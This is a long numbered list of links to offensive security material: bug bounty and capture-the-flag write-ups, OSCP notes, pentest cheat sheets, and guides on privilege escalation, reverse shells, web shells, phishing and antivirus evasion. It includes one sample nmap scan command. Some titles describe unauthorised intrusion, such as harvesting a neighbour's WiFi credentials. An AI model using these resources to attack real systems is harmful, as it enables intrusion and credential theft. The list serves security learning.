-1847-Unauthenticated Blind SSRF in Oracle EBS CVE-2018-3167:
https://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145
-1848-SVG XLink SSRF fingerprinting libraries version:
https://medium.com/@arbazhussain/svg-xlink-ssrf-fingerprinting-libraries-version-450ebecc2f3c
-1849-What is XML Injection Attack:
https://medium.com/@dahiya.aj12/what-is-xml-injection-attack-279691bd00b6
-1850-SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1:
https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978
-1851-Penetration Testing Introduction: Scanning & Reconnaissance:
https://medium.com/cyberdefenders/penetration-testing-introduction-scanning-reconnaissance-f865af0761f
-1852-Beginner’s Guide to recon automation.:
https://medium.com/bugbountywriteup/beginners-guide-to-recon-automation-f95b317c6dbb
-1853-Red Teamer’s Guide to Pulse Secure SSL VPN:
https://medium.com/bugbountywriteup/pulse-secure-ssl-vpn-post-auth-rce-to-ssh-shell-2b497d35c35b
-1854-CVE-2019-15092 WordPress Plugin Import Export Users = 1.3.0 - CSV Injection:
https://medium.com/bugbountywriteup/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection-b5cc14535787
-1855-How I harvested Facebook credentials via free wifi?:
https://medium.com/bugbountywriteup/how-i-harvested-facebook-credentials-via-free-wifi-5da6bdcae049
-1856-How to hack any Payment Gateway?:
https://medium.com/bugbountywriteup/how-to-hack-any-payment-gateway-1ae2f0c6cbe5
-1857-How I hacked into my neighbour’s WiFi and harvested login credentials?:
https://medium.com/bugbountywriteup/how-i-hacked-into-my-neighbours-wifi-and-harvested-credentials-487fab106bfc
-1858-What do Netcat, SMTP and self XSS have in common? Stored XSS:
https://medium.com/bugbountywriteup/what-do-netcat-smtp-and-self-xss-have-in-common-stored-xss-a05648b72002
-1859-1-Click Account Takeover in Virgool.io — a Nice Case Study:
https://medium.com/bugbountywriteup/1-click-account-takeover-in-virgool-io-a-nice-case-study-6bfc3cb98ef2
-1860-Digging into Android Applications — Part 1 — Drozer + Burp:
https://medium.com/bugbountywriteup/digging-android-applications-part-1-drozer-burp-4fd4730d1cf2
-1861-Linux for Pentester: APT Privilege Escalation:
https://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation
-1862-Linux for Pentester : ZIP Privilege Escalation:
https://www.hackingarticles.in/linux-for-pentester-zip-privilege-escalation
-1863-Koadic - COM Command & Control Framework:
https://www.hackingarticles.in/koadic-com-command-control-framework
-1864-Configure Sqlmap for WEB-GUI in Kali Linux :
https://www.hackingarticles.in/configure-sqlmap-for-web-gui-in-kali-linux
-1865-Penetration Testing:
https://www.hackingarticles.in/Penetration-Testing
-1866-Buffer Overflow Examples, Code execution by shellcode :
https://0xrick.github.io/binary-exploitation/bof5
-1867-Dynamic Shellcode Execution:
https://www.countercept.com/blog/dynamic-shellcode-execution
-1868-JSC Exploits:
-https://googleprojectzero.blogspot.com/2019/08/jsc-exploits.html
-1869-Injecting Into The Hunt:
https://jsecurity101.com/2019/Injecting-Into-The-Hunt
-1870-Bypassing Antivirus with Golang:
https://labs.jumpsec.com/2019/06/20/bypassing-antivirus-with-golang-gopher.it
-1871-Windows Process Injection: Print Spooler:
https://modexp.wordpress.com/2019/03/07/process-injection-print-spooler
-1872-Inject Shellcode Into Memory Using Unicorn :
https://ethicalhackingguru.com/inject-shellcode-memory-using-unicorn
-1873-Macros and More with SharpShooter v2.0:
https://www.mdsec.co.uk/2019/02/macros-and-more-with-sharpshooter-v2-0
-1874-Fuzz Testing(Fuzzing) Tutorial: What is, Types, Tools & Example:
https://www.guru99.com/fuzz-testing
-1875-Introduction to File Format Fuzzing & Exploitation:
https://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3
-1876-Hacking a social media account and safeguarding it:
https://medium.com/@ujasdhami79/hacking-a-social-media-account-and-safeguarding-it-e5f69adf62d7
-1877-OTP Bypass on India’s Biggest Video Sharing Site:
https://medium.com/bugbountywriteup/otp-bypass-on-indias-biggest-video-sharing-site-e94587c1aa89
-1879-Getting Root on macOS via 3rd Party Backup Software:
https://medium.com/tenable-techblog/getting-root-on-macos-via-3rd-party-backup-software-b804085f0c9
-1880-How to Enumerate MYSQL Database using Metasploit:
https://ehacking.net/2020/03/how-to-enumerate-mysql-database-using-metasploit-kali-linux-tutorial.html
-1881-Exploiting Insecure Firebase Database!
https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty
-1882-Penetration Testing - Complete Guide:
https://softwaretestinghelp.com/penetration-testing-guide
-1883-How To Upload A PHP Web Shell On WordPress Site:
https://1337pwn.com/how-to-upload-php-web-shell-on-wordpress-site
-1884-Mimikatz tutorial: How it hacks Windows passwords, credentials:
https://searchsecurity.techtarget.com/tutorial/Mimikatz-tutorial-How-it-hacks-Windows-passwords-credentials
-1885-Ethical hacking: Lateral movement techniques:
https://securityboulevard.com/2019/09/ethical-hacking-lateral-movement-techniques
-1886-A Pivot Cheatsheet for Pentesters:
http://nullsweep.com/pivot-cheatsheet-for-pentesters
-1887-What to Look for When Reverse Engineering Android Apps:
http://nowsecure.com/blog/2020/02/26/what-to-look-for-when-reverse-engineering-android-apps
-1888-Modlishka: Advance Phishing to Bypass 2 Factor Auth:
http://crackitdown.com/2019/02/modlishka-kali-linux.html
-1889-Bettercap Usage Examples (Overview, Custom setup, Caplets ):
www.cyberpunk.rs/bettercap-usage-examples-overview-custom-setup-caplets
-1890-The Complete Hashcat Tutorial:
https://ethicalhackingguru.com/the-complete-hashcat-tutorial
-1891-Wireless Wifi Penetration Testing Hacker Notes:
https://executeatwill.com/2020/01/05/Wireless-Wifi-Penetration-Testing-Hacker-Notes
-1892-#BugBounty writeups:
https://pentester.land/list-of-bug-bounty-writeups.html
-1893-Kerberoasting attack:
https://en.hackndo.com/kerberoasting
-1894-A Pentester's Guide - Part 2 (OSINT - LinkedIn is not just for jobs):
https://delta.navisec.io/osint-for-pentesters-part-2-linkedin-is-not-just-for-jobs
-1895-Radare2 cutter tutorial:
http://cousbox.com/axflw/radare2-cutter-tutorial.html
-1896-Cracking Password Hashes with Hashcat:
http://hackingvision.com/2020/03/22/cracking-password-hashes-hashcat
-1897-From CSRF to RCE and WordPress-site takeover CVE-2020-8417:
http://blog.wpsec.com/csrf-to-rce-wordpress
-1898-Best OSINT Tools:
http://pcwdld.com/osint-tools-and-software
-1899-Metasploit Exploitation Tool 2020:
http://cybervie.com/blog/metasploit-exploitation-tool
-1900-How to exploit CVE-2020-7961:
https://synacktiv.com/posts/pentest/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html
-1901-PowerShell for Pentesters:
https://varonis.com/blog/powershell-for-pentesters
-1902-Android Pentest Tutorial:
https://packetstormsecurity.com/files/156432/Android-Pentest-Tutorial-Step-By-Step.html
-1903-Burp Suite Tutorial:
https://pentestgeek.com/web-applications/burp-suite-tutorial-1
-1904-Company Email Enumeration + Breached Email Finder:
https://metalkey.github.io/company-email-enumeration--breached-email-finder.html
-1905-Kali Linux Cheat Sheet for Penetration Testers:
https://github.com/NoorQureshi/kali-linux-cheatsheet
-1906-Active Directory Exploitation Cheat Sheet:
A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.
https://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#using-bloodhound
-1907-Advanced Hacking Tutorials Collection:
https://yeahhub.com/advanced-hacking-tutorials-collection
-1908-Persistence – DLL Hijacking:
https://pentestlab.blog/2020/03/04/persistence-dll-hijacking
-1909-Brute force and dictionary attacks: A cheat sheet:
https://techrepublic.com/article/brute-force-and-dictionary-attacks-a-cheat-sheet
-1910-How to use Facebook for Open Source Investigation:
https://securitynewspaper.com/2020/03/11/how-to-use-facebook-for-open-source-investigation-osint
-1911-tcpdump Cheat Sheet:
https://comparitech.com/net-admin/tcpdump-cheat-sheet
-1912-Windows Post exploitation recon with Metasploit:
https://hackercool.com/2016/10/windows-post-exploitation-recon-with-metasploit
-1913-Bug Hunting Methodology:
https://blog.usejournal.com/bug-hunting-methodology-part-1-91295b2d2066
-1914-Malware traffic analysis tutorial:
https://apuntpsicolegs.com/veke0/malware-traffic-analysis-tutorial.html
-1915-Recon-ng v5 Tutorial:
https://geekwire.eu/recon-ng-v5-tutorial
-1916-Windows and Linux Privilege Escalation Tools:
https://yeahhub.com/windows-linux-privilege-escalation-tools-2019
-1917-Total OSCP Guide:
https://sushant747.gitbooks.io/total-oscp-guide
-1918-Phishing Windows Credentials:
https://pentestlab.blog/2020/03/02/phishing-windows-credentials
-1919-Getting What You're Entitled To: A Journey Into MacOS Stored Credentials:
https://mdsec.co.uk/2020/02/getting-what-youre-entitled-to-a-journey-in-to-macos-stored-credentials
-1920-Recent Papers Related To Fuzzing:
https://wcventure.github.io/FuzzingPaper
-1921-Web Shells 101 Using PHP (Web Shells Part 2):
https://acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/
-1922-Python3 reverse shell:
https://polisediltrading.it/hai6jzbs/python3-reverse-shell.html
-1923-Reverse Shell between two Linux machines:
https://yeahhub.com/reverse-shell-linux-machines
-1924-Tutorial - Writing Hardcoded Windows Shellcodes (32bit):
https://dsolstad.com/shellcode/2020/02/02/Tutorial-Hardcoded-Writing-Hardcoded-Windows-Shellcodes-32bit.html
-1925-How to Use Wireshark: Comprehensive Tutorial + Tips:
https://varonis.com/blog/how-to-use-wireshark
-1926-How To Use PowerShell for Privilege Escalation with Local Privilege Escalation?
https://varonis.com/blog/how-to-use-powershell-for-privilege-escalation-with-local-computer-accounts
-1927-Ethical hacking:Top privilege escalation techniques in Windows:
https://securityboulevard.com/2020/03/ethical-hacking-top-privilege-escalation-techniques-in-windows
-1928-How to Identify Company's Hacked Email Addresses:
https://ehacking.net/2020/04/how-to-identify-companys-hacked-email-addresses-using-maltego-osint-haveibeenpawned.html
-1929-Android APK Reverse Engineering: What's in an APK:
https://secplicity.org/2019/09/11/android-apk-reverse-engineering-whats-in-an-apk
-1930-Keep Calm and HackTheBox - Beep:
https://freecodecamp.org/news/keep-calm-and-hack-the-box-beep/
-1931-Keep Calm and HackTheBox -Legacy:
https://freecodecamp.org/news/keep-calm-and-hack-the-box-legacy/
-1932-Keep Calm and HackTheBox -Lame:
https://freecodecamp.org/news/keep-calm-and-hack-the-box-lame/
-1933-HacktheBox:Writeup Walkthrough:
https://hackingarticles.in/hack-the-box-writeup-walkthrough
-1934-2020 OSCP Exam Preparation:
https://cybersecurity.att.com/blogs/security-essentials/how-to-prepare-to-take-the-oscp
-1935-My OSCP transformation:
https://kevsec.fr/journey-to-oscp-2019-write-up
-1936-A Detailed Guide on OSCP Preparation:
https://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/
-1937-Useful Commands and Tools - #OSCP:
https://yeahhub.com/useful-commands-tools-oscp/
-1938-Comprehensive Guide on Password Spraying Attack
https://hackingarticles.in/comprehensive-guide-on-password-spraying-attack
-1939-Privilege Escalation:
https://pentestlab.blog/category/privilege-escalation/
-1940-Red Team:
https://pentestlab.blog/category/red-team/
-1941-Linux post-exploitation.Advancing from user to super-user in a few clicks
https://hackmag.com/security/linux-killchain/
-1942--#BugBounty Cheatsheet
https://m0chan.github.io/2019/12/17/Bug-Bounty-Cheetsheet.html
-1943--#Windows Notes/Cheatsheet
https://m0chan.github.io/2019/07/30/Windows-Notes-and-Cheatsheet.html
-1944-#Linux Notes/Cheatsheet
https://m0chan.github.io/2018/07/31/Linux-Notes-And-Cheatsheet.html
-1945-Windows Notes
https://mad-coding.cn/tags/Windows/
-1946-#BlueTeam CheatSheet
https://gist.github.com/SwitHak/62fa7f8df378cae3a459670e3a18742d
-1947-Linux Privilege Escalation Cheatsheet for OSCP:
https://hackingdream.net/2020/03/linux-privilege-escalation-cheatsheet-for-oscp.html
-1948-Shodan Pentesting Guide:
https://community.turgensec.com/shodan-pentesting-guide
-1949-Pentesters Guide to PostgreSQL Hacking:
https://medium.com/@netscylla/pentesters-guide-to-postgresql-hacking-59895f4f007
-1950-Hacking-OSCP cheatsheet:
https://ceso.github.io/posts/2020/04/hacking/oscp-cheatsheet/
-1951-A Comprehensive Guide to Breaking SSH:
https://community.turgensec.com/ssh-hacking-guide
-1952-Windows Privilege Escalation Methods for Pentesters:
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
-1953-Best #firefox addons for #Hacking:
https://twitter.com/cry__pto/status/1210836734331752449
-1954-S3 Bucket Enumeration Tools:
https://twitter.com/cry__pto/status/1269862357645307904
-1955-Github Recon Tools:
https://twitter.com/cry__pto/status/1269362041044832257
-1956-i created this group for more in depth sharing about hacking and penetration testing /daily posts: you can join:
https://facebook.com/groups/AmmarAmerHacker
-1957-Directory Bruteforcing Tools: && SCREENSHOTTING Tools:
https://twitter.com/cry__pto/status/1270603017256124416
-1958-S3 Bucket Enumeration Tools:
https://twitter.com/cry__pto/status/1269862357645307904
-1959-Github Recon Tools:
https://twitter.com/cry__pto/status/1269362041044832257
-1960-Website Mirroring Tools:
https://twitter.com/cry__pto/status/1248640849812078593
-1961-automated credential discovery tools:
https://twitter.com/cry__pto/status/1253214720372465665
-1962-Antiforensics Techniques:
https://twitter.com/cry__pto/status/1215001674760294400
-1963-#bugbounty tools part (1):
https://twitter.com/cry__pto/status/1212096231301881857
1964-Binary Analysis Frameworks:
https://twitter.com/cry__pto/status/1207966421575184384
-1965-#BugBounty tools part (5):
https://twitter.com/cry__pto/status/1214850754055458819
-1966-#BugBounty tools part (3):
https://twitter.com/cry__pto/status/1212290510922158080
-1967-Kali Linux Commands List (Cheat Sheet):
https://twitter.com/cry__pto/status/1264530546933272576
-1968-#BugBounty tools part (4):
https://twitter.com/cry__pto/status/1212296173412851712
-1969--Automated enumeration tools:
https://twitter.com/cry__pto/status/1214919232389099521
-1970-DNS lookup information Tools:
https://twitter.com/cry__pto/status/1248639962746105863
-1971-OSCP:
https://twitter.com/cry__pto/status/1262089078339756032
-1972-Social Engineering Tools:
https://twitter.com/cry__pto/status/1180731438796333056
-1973-Hydra :
https://twitter.com/cry__pto/status/1247507926807449600
-1974-#OSINT Your Full Guide:
https://twitter.com/cry__pto/status/1244433669936349184
-1975-#BugBounty tools part (2):
https://twitter.com/cry__pto/status/1212289852059860992
-1976-my own ebook library:
https://twitter.com/cry__pto/status/1239308541468516354
-1977-Practice part (2):
https://twitter.com/cry__pto/status/1213165695556567040
-1978-Practice part (3):
https://twitter.com/cry__pto/status/1214220715337097222
-1979-my blog:
https://twitter.com/cry__pto/status/1263457516672954368
-1980-Practice:
https://twitter.com/cry__pto/status/1212341774569504769
-1981-how to search for XSS without proxy tool:
https://twitter.com/cry__pto/status/1252558806837604352
-1982-How to collect email addresses from search engines:
https://twitter.com/cry__pto/status/1058864931792138240
-1983-Hacking Tools Cheat Sheet:
https://twitter.com/cry__pto/status/1255159507891687426
-1984-#OSCP Your Full Guide:
https://twitter.com/cry__pto/status/1240842587927445504
-1985-#HackTheBox Your Full Guide:
https://twitter.com/cry__pto/status/1241481478539816961
-1986-Web Scanners:
https://twitter.com/cry__pto/status/1271826773009928194
-1987-HACKING MAGAZINES:
-1-2600 — The Hacker Quarterly magazine:www.2600.com
-2-Hackin9:http://hakin9.org
-3-(IN)SECURE magazine:https://lnkd.in/grNM2t8
-4-PHRACK:www.phrack.org/archives
-5-Hacker’s Manual 2019
-1988-Web Exploitation Tools:
https://twitter.com/cry__pto/status/1272778056952885249
-1989-Kali Linux Cheat Sheet for Hackers:
https://twitter.com/cry__pto/status/1272792311236263937
-1990-Web Exploitation Tools:
https://twitter.com/cry__pto/status/1272778056952885249
-1991-2020 OSCP Exam Preparation + My OSCP transformation +A Detailed Guide on OSCP Preparation + Useful Commands and Tools - #OSCP:
https://twitter.com/cry__pto/status/1262089078339756032
-1992-100 Best Hacking Tools for Security Professionals in 2020:
https://gbhackers.com/hacking-tools-list/
-1993-SNMP Enumeration:
OpUtils:www.manageengine.com
SNMP Informant:www.snmp-informant.com
SNMP Scanner:www.secure-bytes.com
SNMPUtil:www.wtcs.org
SolarWinds:www.solarwinds.com
-1994-INFO-SEC RELATED CHEAT SHEETS:
https://twitter.com/cry__pto/status/1274768435361337346
-1995-METASPLOIT CHEAT SHEET:
https://twitter.com/cry__pto/status/1274769179548278786
-1996-Nmap Cheat Sheet, plus bonus Nmap + Nessus:
https://twitter.com/cry__pto/status/1275359087304286210
-1997-Wireshark Cheat Sheet - Commands, Captures, Filters, Shortcuts & More:
https://twitter.com/cry__pto/status/1276391703906222080
-1998-learn penetration testing a great series as PDF:
https://twitter.com/cry__pto/status/1277588369426526209
-1999-Detecting secrets in code committed to Gitlab (in real time):
https://www.youtube.com/watch?v=eCDgUvXZ_YE
-2000-Penetration Tester’s Guide to Evaluating OAuth 2.0 — Authorization Code Grants:
https://maxfieldchen.com/posts/2020-05-17-penetration-testers-guide-oauth-2.html
-2001-Building Virtual Machine Labs:
https://github.com/da667/Building_Virtual_Machine_Labs-Live_Training
-2002-Windows Kernel Exploit Cheat Sheet for [HackTheBox]:
https://kakyouim.hatenablog.com/entry/2020/05/27/010807
-2003-19 Powerful Penetration Testing Tools In 2020 (Security Testing Tools):
https://softwaretestinghelp.com/penetration-testing-tools/
-2004-Full Connect Scan (-sT):
-complete the three-way handshake
-slower than SYN scan
-no need for superuser Privileges
-when stealth is not required
-to know for sure which port is open
-when running port scan via proxies like TOR
-it can be detected
nmap -sT -p 80 192.168.1.110
-2005-today i learned that you can use strings command to extract email addresses from binary files:
strings -n 8 /usr/bin/who | grep '@'
-2005-pentest cheat sheet :
https://gist.github.com/githubfoam/4d3c99383b5372ee019c8fbc7581637d
-2006-Tcpdump cheat sheet :
https://gist.github.com/jforge/27962c52223ea9b8003b22b8189d93fb
-2007-tcpdump - reading tcp flags :
https://gist.github.com/tuxfight3r/9ac030cb0d707bb446c7
-2008-CTF-Notes - Hackers Resources Galore:
https://github.com/TheSecEng/CTF-notes
-2009-Pentest-Cheat-Sheets:
https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets
-2010--2-Web Application Cheatsheet (Vulnhub):
https://github.com/Ignitetechnologies/Web-Application-Cheatsheet
-2011-A cheatsheet with commands that can be used to perform kerberos attacks :
https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
-2012-Master Shodan Search Engine:
https://rootkitpen.blogspot.com/2020/08/master-shodan-search-engine.html
-2013-CTF Cheatsheet:
https://github.com/uppusaikiran/awesome-ctf-cheatsheet
-2014-Pentesting Cheatsheet:
https://gist.github.com/jeremypruitt/c435aefa2c2abaec02985d77fb370ec5
-2015-Hacking Cheatsheet:
https://github.com/kobs0N/Hacking-Cheatsheet
-2016-Hashcat-Cheatsheet:
https://github.com/frizb/Hashcat-Cheatsheet
-2017-Wireshark Cheat Sheet:
https://github.com/security-cheatsheet/wireshark-cheatsheet
-2018-JustTryHarder:
https://github.com/sinfulz/JustTryHarder
-2019-PWK-CheatSheet:
https://github.com/ibr2/pwk-cheatsheet
-2020-kali linux cheatsheet:
https://github.com/NoorQureshi/kali-linux-cheatsheet
-2021-Hydra-Cheatsheet:
https://github.com/frizb/Hydra-Cheatsheet
-2022-Security Tools Cheatsheets:
https://github.com/jayeshjodhawat
-2023-popping-shells-instead-of-alert-boxes-weaponizing-xss-for-fun-and-profit:
https://www.trustedsec.com/events/webinar-popping-shells-instead-of-alert-boxes-weaponizing-xss-for-fun-and-profit/
-2024-TRICKS FOR WEAPONIZING XSS:
https://www.trustedsec.com/blog/tricks-for-weaponizing-xss/
-2025-OSCP Notes:
https://github.com/tbowman01/OSCP-PWK-Notes-Public
-2026-OSCP Notes:
https://github.com/Technowlogy-Pushpender/oscp-notes
-2027-list of useful commands, shells and notes related to OSCP:
https://github.com/s0wr0b1ndef/OSCP-note
-2028-Notes for taking the OSCP in 2097:
https://github.com/dostoevskylabs/dostoevsky-pentest-notes
-2029-My OSCP notes:
https://github.com/tagnullde/OSCP
-2030-Discover Blind Vulnerabilities with DNSObserver: an Out-of-Band DNS Monitor
https://www.allysonomalley.com/2020/05/22/dnsobserver/
-2031-Red Team Notes:
https://dmcxblue.gitbook.io/red-team-notes/
-2032-Evading Detection with Excel 4.0 Macros and the BIFF8 XLS Format:
https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls
-2033-ESCALATING SUBDOMAIN TAKEOVERS TO STEAL COOKIES BY ABUSING DOCUMENT.DOMAIN:
https://blog.takemyhand.xyz/2019/05/escalating-subdomain-takeovers-to-steal.html
-2034-[SSTI] BREAKING GO'S TEMPLATE ENGINE TO GET XSS:
https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html
-2035-Metasploitable 3:
https://kakyouim.hatenablog.com/entry/2020/02/16/213616
-2036-Reverse engineering and modifying an Android game:
https://medium.com/swlh/reverse-engineering-and-modifying-an-android-game-apk-ctf-c617151b874c
-2037-Reverse Engineering The Medium App (and making all stories in it free):
https://medium.com/hackernoon/dont-publish-yet-reverse-engineering-the-medium-app-and-making-all-stories-in-it-free-48c8f2695687
-2038-Android Apk Reverse Engineering:
https://medium.com/@chris.yn.chen/apk-reverse-engineering-df7ed8cec191
-2039-DIY Web App Pentesting Guide:
https://medium.com/@luke_83192/diy-web-app-pentesting-guide-be54b303c6eb
-2040-Local Admin Access and Group Policy Don’t Mix:
https://www.trustedsec.com/blog/local-admin-access-and-group-policy-dont-mix/
-2041-BREAKING TYPICAL WINDOWS HARDENING IMPLEMENTATIONS:
https://www.trustedsec.com/blog/breaking-typical-windows-hardening-implementations/
-2042-Decrypting ADSync passwords - my journey into DPAPI:
https://o365blog.com/post/adsync/
-2043-Ultimate Guide: PostgreSQL Pentesting:
https://medium.com/@lordhorcrux_/ultimate-guide-postgresql-pentesting-989055d5551e
-2044-SMB Enumeration for Penetration Testing:
https://medium.com/@arnavtripathy98/smb-enumeration-for-penetration-testing-e782a328bf1b
-2045-(Almost) All The Ways to File Transfer:
https://medium.com/@PenTest_duck/almost-all-the-ways-to-file-transfer-1bd6bf710d65
-2046-HackTheBox TartarSauce Writeup:
https://kakyouim.hatenablog.com/entry/2020/05/14/230445
-2047-Kerberos-Attacks-In-Depth:
https://m0chan.github.io/Kerberos-Attacks-In-Depth
-2048-From Recon to Bypassing MFA Implementation in OWA by Using EWS Misconfiguration:
https://medium.com/bugbountywriteup/from-recon-to-bypassing-mfa-implementation-in-owa-by-using-ews-misconfiguration-b6a3518b0a63
-2049-Writeups for infosec Capture the Flag events by team Galaxians:
https://github.com/shiltemann/CTF-writeups-public
-2050-Angstrom CTF 2018 — web challenges [writeup]:
https://medium.com/bugbountywriteup/angstrom-ctf-2018-web-challenges-writeup-8a69998b0123
-2051-How to get started in CTF | Complete Begineer Guide:
https://medium.com/bugbountywriteup/how-to-get-started-in-ctf-complete-begineer-guide-15ab5a6856d
-2052-Hacking 101: An Ethical Hackers Guide for Getting from Beginner to Professional:
https://medium.com/@gavinloughridge/hacking-101-an-ethical-hackers-guide-for-getting-from-beginner-to-professional-cd1fac182ff1
-2053-Reconnaissance the key to Ethical Hacking!:
https://medium.com/techloop/reconnaissance-the-key-to-ethical-hacking-3b853510d977
-2054-Day 18: Essential CTF Tools:
https://medium.com/@int0x33/day-18-essential-ctf-tools-1f9af1552214
-2055-OSCP Cheatsheet:
https://medium.com/oscp-cheatsheet/oscp-cheatsheet-6c80b9fa8d7e
-2056-OSCP Cheat Sheet:
https://medium.com/@cymtrick/oscp-cheat-sheet-5b8aeae085ad
-2057-TryHackMe: vulnversity:
https://medium.com/@ratiros01/tryhackme-vulnversity-42074b8644df
-2058-Malware Analysis Tools And Resources:
https://medium.com/@NasreddineBencherchali/malware-analysis-tools-and-resources-16eb17666886
-2059-Extracting Embedded Payloads From Malware:
https://medium.com/@ryancor/extracting-embedded-payloads-from-malware-aaca8e9aa1a9
-2060-Attacks and Techniques Used Against WordPress Sites:
https://www.trendmicro.com/en_us/research/19/l/looking-into-attacks-and-techniques-used-against-wordpress-sites.html
-2061-Still Scanning IP Addresses? You’re Doing it Wrong:
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/still-scanning-ip-addresses-you-re-doing-it-wrong/
-2062-Source Code Disclosure via Exposed .git Folder:
https://medium.com/dev-genius/source-code-disclosure-via-exposed-git-folder-24993c7561f1
-2063-GitHub Recon - It’s Really Deep:
https://medium.com/@shahjerry33/github-recon-its-really-deep-6553d6dfbb1f
-2064-From SSRF to Compromise: Case Study:
https://trustwave.com/en-us/resources/blogs/spiderlabs-blog/from-ssrf-to-compromise-case-study/
-2065-Bug Hunting with Param Miner: Cache poisoning with XSS, a peculiar case:
https://medium.com/bugbountywriteup/cache-poisoning-with-xss-a-peculiar-case-eb5973850814
-2066-Akamai Web Application Firewall Bypass Journey: Exploiting “Google BigQuery” SQL Injection Vulnerability:
https://hackemall.live/index.php/2020/03/31/akamai-web-application-firewall-bypass-journey-exploiting-google-bigquery-sql-injection-vulnerability/
-2067-Avoiding detection via dhcp options:
https://sensepost.com/blog/2020/avoiding-detection-via-dhcp-options/
-2068-Bug Bytes #86 - Stealing local files with Safari, Prototype pollution vs HTML sanitizers & A hacker’s mom learning bug bounty:
https://blog.intigriti.com/2020/09/02/bug-bytes-86-stealing-local-files-with-safari-prototype-pollution-vs-html-sanitizers-a-hackers-mom-learning-bug-bounty/
-2069-Bug Bytes #78 - BIG-IP RCE, Azure account takeover & Hunt scanner is back:
https://blog.intigriti.com/2020/07/08/bug-bytes-78-big-ip-rce-azure-account-takeover-hunt-scanner-is-back/
-2070-Hacking a Telecommunication company(MTN):
https://medium.com/@afolicdaralee/hacking-a-telecommunication-company-mtn-c46696451fed
-2071-$20000 Facebook DOM XSS:
https://vinothkumar.me/20000-facebook-dom-xss/
-2072-Backdooring WordPress with Phpsploit:
https://blog.wpsec.com/backdooring-wordpress-with-phpsploit/
-2073-Pro tips for bugbounty:
https://medium.com/@chawdamrunal/pro-tips-for-bug-bounty-f9982a5fc5e9
-2074-Collection Of #bugbountytips:
https://medium.com/@vignesh4303/collection-of-bug-bounty-tip-will-be-updated-daily-605911cfa248
-2075-Offensive Netcat/Ncat: From Port Scanning To Bind Shell IP Whitelisting:
https://medium.com/@PenTest_duck/offensive-netcat-ncat-from-port-scanning-to-bind-shell-ip-whitelisting-834689b103da
-2076-XSS for beginners:
https://medium.com/swlh/xss-for-beginners-6752b1b1487d
-2077-LET’S GO DEEP INTO OSINT: PART 1:
medium.com/bugbountywriteup/lets-go-deep-into-osint-part-1-c2de4fe4f3bf
-2087-Beginner’s Guide to recon automation:
medium.com/bugbountywriteup/beginners-guide-to-recon-automation-f95b317c6dbb
-2079-Automating Recon:
https://medium.com/@amyrahm786/automating-recon-28b36dc2cf48
-2080-XSS WAF & Character limitation bypass like a boss:
https://medium.com/bugbountywriteup/xss-waf-character-limitation-bypass-like-a-boss-2c788647c229
-2081-Chaining Improper Authorization To Race Condition To Harvest Credit Card Details : A Bug Bounty Story:
https://medium.com/@ciph3r7r0ll/chaining-improper-authorization-to-race-condition-to-harvest-credit-card-details-a-bug-bounty-effe6e0f5076
-2082-TryHackMe Linux Challenges:
https://secjuice.com/write-up-10-tryhackme-linux-challenges-part-1/
-2083-Persistence – COM Hijacking:
https://pentestlab.blog/2020/05/20/persistence-com-hijacking/
-2084-DLL Proxy Loading Your Favourite C# Implant
https://redteaming.co.uk/2020/07/12/dll-proxy-loading-your-favorite-c-implant/
-2085-how offensive actors use applescript for attacking macos:
https://sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos
-2086-Windows Privilege Escalation without Metasploit
https://medium.com/@sushantkamble/windows-privilege-escalation-without-metasploit-9bad5fbb5666
-2087-Privilege Escalation in Windows:
https://medium.com/bugbountywriteup/privilege-escalation-in-windows-380bee3a2842
-2088-OSWE Prep — Hack The Box Magic:
https://medium.com/@ranakhalil101/oswe-prep-hack-the-box-magic-f173e2d09125
-2089-Hackthebox | Bastion Writeup:
https://medium.com/@_ncpd/hackthebox-bastion-writeup-9d6f6da3bcbb
-2090-Hacking Android phone remotely using Metasploit:
https://medium.com/@irfaanshakeel/hacking-android-phone-remotely-using-metasploit-43ccf0fbe9b8
-2091-“Hacking with Metasploit” Tutorial:
https://medium.com/cybersoton/hacking-with-metasploit-tutorial-7635b9d19e5
-2092-Hack The Box — Tally Writeup w/o Metasploit:
https://medium.com/@ranakhalil101/hack-the-box-tally-writeup-w-o-metasploit-b8bce0684ad3
-2093-Burp Suite:
https://medium.com/cyberdefendersprogram/burp-suite-webpage-enumeration-and-vulnerability-testing-cfd0b140570d
-2094-h1–702 CTF — Web Challenge Write Up:
https://medium.com/@amalmurali47/h1-702-ctf-web-challenge-write-up-53de31b2ddce
-2095-SQL Injection & Remote Code Execution:
https://medium.com/@shahjerry33/sql-injection-remote-code-execution-double-p1-6038ca88a2ec
-2096-Juicy Infos hidden in js scripts leads to RCE :
https://medium.com/@simobalghaoui/juicy-infos-hidden-in-js-scripts-lead-to-rce-5d4abbf24d9c
-2097-Escalating Privileges like a Pro:
https://gauravnarwani.com/escalating-privileges-like-a-pro/
-2098-Top 16 Active Directory Vulnerabilities:
https://www.infosecmatter.com/top-16-active-directory-vulnerabilities/
-2099-Windows Red Team Cheat Sheet:
https://morph3sec.com/Cheat-Sheets/Windows-Red-Team-Cheat-Sheet/
-2100-OSCP: Developing a Methodology:
https://medium.com/@falconspy/oscp-developing-a-methodology-32f4ab471fd6
-2101-Zero to OSCP: Concise Edition:
https://medium.com/@1chidan/zero-to-oscp-concise-edition-b5ecd4a781c3
-2102-59 Hosts to Glory — Passing the OSCP:
